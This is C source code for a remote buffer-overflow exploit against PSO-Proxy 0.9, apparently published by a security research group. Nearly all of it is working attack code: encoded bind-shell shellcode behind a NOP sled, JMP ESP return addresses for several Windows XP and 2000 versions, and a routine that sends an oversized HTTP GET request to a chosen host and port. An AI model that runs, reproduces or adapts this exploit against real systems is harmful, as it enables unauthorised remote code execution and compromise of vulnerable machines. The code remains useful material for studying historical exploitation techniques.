/* THE EYE ON SECURITY - RESEARCH GROUP - INDIA http://www.eos-india.net PSO-Proxy 0.9 Remote Exploit abhisek@eos-india.net Conventional Windows stack based buffer overflow exploit overwrites EIP with address of JMP ESP to return control to our shellcode. */ #include #include #ifdef _WIN32 #include #include #pragma comment(lib,"ws2_32") #else #include #include #include #endif #ifndef _WIN32 #define closesocket close #else #define SHUT_RDWR 0 #endif char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A" "\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6" "\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D" "\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A" "\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58" "\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0" "\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41" "\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B" "\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D" "\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA" "\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10" "\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF" "\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8" "\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79" "\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C" "\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59" "\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD" "\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC" "\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5" "\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6" "\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0" "\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED" "\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99" ; #define BUFF 1024 #define MAX_TARG 5 struct target { char *os; unsigned long jump; } t[] = { "Windows XP SP0", 0x77f5801c, "Windows XP SP1", 0x77fb4dcc, "Windows 2000 SP0", 0x77f8948b, "Windows 2000 SP1", 0x77f991ab, "Demo\t", 0xbadc0ded, NULL, 0 }; void cleanup(int sockfd) { shutdown(sockfd,SHUT_RDWR); closesocket(sockfd); #ifdef _WIN32 WSACleanup(); #endif } #ifdef _WIN32 void init_winsock() { WSADATA WSAData; if(WSAStartup(MAKEWORD(1,1),&WSAData)) exit(1); } #endif int main(int argc,char *argv[]) { int sockfd; struct sockaddr_in sin; struct hostent *host; char *buff; char *ptr; int i; unsigned long magic; unsigned short port; int bsize=BUFF+4+strlen(shellcode)+2+1; i=0; if(argc != 5) { printf("[Usage]\n"); printf("%s [Remote Host] [Remote Port] [Target] [Bind Port]\n",argv[0]); printf("Available Targets:\n"); while(t[i].jump) { printf("%d -> %s\t0x%08x\n",i,t[i].os,t[i].jump); i++; } exit(1); } #ifdef _WIN32 init_winsock(); #endif if((host=gethostbyname(argv[1]))==NULL) { perror("gethostbyname"); exit(1); } i=atoi(argv[3]); if((i<0)||(i>=MAX_TARG)) { printf("Invalid Target\n"); exit(1); } port=htons(atoi(argv[4]))^(unsigned short)0x9999; memcpy(&shellcode[176],&port,2); sin.sin_addr=*((struct in_addr*)host->h_addr_list[0]); sin.sin_family=AF_INET; sin.sin_port=htons((u_short)atoi(argv[2])); if((sockfd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("socket"); exit(1); } if(connect(sockfd,(struct sockaddr*)&sin,sizeof(sin))) { perror("connect"); cleanup(sockfd); exit(1); } if((buff=(char*)malloc(bsize))==NULL) { perror("malloc"); cleanup(sockfd); exit(1); } magic=t[i].jump; printf("Target OS: %s\nRET: 0x%08x\n",t[i].os,magic); memset(buff,0x00,bsize); strcpy(buff,"GET /"); ptr=buff+strlen(buff); memset(ptr,0x41,BUFF-strlen(buff)); ptr=buff+BUFF; memcpy(ptr,shellcode,strlen(shellcode)); ptr=buff+BUFF+strlen(shellcode); *(ptr++)='\r'; *(ptr++)='\n'; *(ptr)=0x00; memcpy(buff+BUFF,&magic,4); printf("Length of exploit buffer: %d\n",strlen(buff)); if(send(sockfd,buff,bsize,0) != bsize) { printf("Failed to send exploit buffer\n"); cleanup(sockfd); } printf("Exploit buffer send successfully\n"); cleanup(sockfd); free(buff); return 0; }